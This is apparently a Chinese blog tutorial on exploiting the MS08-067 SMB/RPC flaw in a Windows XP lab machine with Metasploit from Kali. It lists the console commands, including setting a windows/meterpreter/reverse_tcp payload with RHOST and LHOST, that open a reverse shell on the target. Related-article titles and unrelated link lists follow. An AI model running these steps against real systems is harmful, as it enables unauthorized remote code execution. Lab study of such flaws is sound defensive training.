kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

漏洞简介

MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

实验环境:

工具:metasploit

靶机两台:windows xp2和kali2020

攻击机的IP(kali):192.168.29.133

靶机IP(xp2):  192.168.29.134

实验条件:两台机子可以互通的,并且windows xp2(需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。

步骤:

1)在kali终端输入msfconsole,启动Metasploit工具

2)输入命令search   ms08_067,查找关于ms08_067的漏洞模块。

3)输入如下命令,使用该漏洞模块

4进入这个模块后,show options 查看该模块需要配置的参数

5)设置配置项(show options)

设置靶机IP(xp2set RHOST 192.168.29.134

设置要执行的payload: set payload windows/meterpreter/reverse_tcp

设置攻击机的IP(kali):set LHOST 192.168.29.133

设置要攻击的目标操作系统类型:set target 34

用show options查看相关参数是否配置正确

6)最后,输入exploit,回车运行,进入到特殊的payload---meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置。

kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)相关推荐

  1. kali利用MSF对永恒之蓝漏洞入侵windows7

    warning 本文目的并不是教会学者入侵win7主机, 而是加强防范 kali入侵win7 步骤一:实验环境的搭建 攻击机:kali(2022.3版本) 靶机:win7 专业版 sp1 x64位 安 ...

  2. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

  3. kail利用msf工具对MS12-020漏洞进行渗透测试

    kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...

  4. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  5. Kali利用MSF入侵安卓手机

    kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

  6. Kali利用msf对MS10_061漏洞进行渗透测试

    注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...

  7. kail利用msf工具对ms11-003漏洞入侵渗透Win7

    前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...

  8. kali利用MSF对ms17_010漏洞入侵win7

    步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...

  9. Kali利用msf渗透Windows电脑(超详细)

    Kali利用msfvenom渗透Windows电脑 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执 ...

最新文章

  1. OpenMP在Windows下用VS使用
  2. 李开复:职场人35岁以后,真诚比面子重要,均衡比魄力重要!
  3. Pandas处理数据缺失值
  4. html 修改背景透明度,html – 用css更改背景图像的不透明度
  5. SpringMvc @RequestParam、 @RequestBody、@RequestPart 的区别
  6. 如何让你在开发者工具中查看源代码有语法高亮和暗黑主题的效果
  7. 一台linux服务器配置多个tomcat应用
  8. 78. Cookie
  9. discuz子导航下面的版块只有图标没有标题,什么原因?
  10. python实例代码爬虫_python 网络爬虫实例代码
  11. 计算机桌面左上角 鼠标,鼠标一直跑到桌面左上角怎么解决
  12. 【最新面试技巧分享】面试官想看到的以及面试者需要准备的!
  13. PS | 工作区,工具栏不见了怎么办 -- 复位基本功能
  14. 【Kubernetes】Pod学习(十五)Deployment部署的回滚、暂停和恢复
  15. stormzhang的推荐!
  16. earchs柱形图怎样使某个柱子变色
  17. 带你了解Google搜索引擎的竞价排名是怎样实现的?
  18. python怎么创建文件夹视频_怎么用python创建文件夹
  19. 前端资源压缩合并maven插件之wro4j
  20. 定点乘法器优化---华为杯

热门文章

  1. node mysql安装目录_nodejs 指定全局安装路径和缓存路径
  2. linux 装windows软件,常用软件的安装(windows/linux)
  3. android uri db,Android ContentProvider封装数据库和文件读写总结
  4. android+4.4+jni闪退,native2.1 安卓退到后台时,概率闪退
  5. No module named ‘__main__.common‘; ‘__main__‘ is not a package
  6. lisp将图元追加选择_汕尾幸运儿喜爱大乐透 两次买彩票就擒获8注追加二等奖254万元...
  7. Python 位操作运算符
  8. 常见的几种异常类型-熟记
  9. 13.5.SolrCloud集群使用手册之数据导入
  10. DEV控件中GridView中的复选框与CheckBox实现联动的全选功能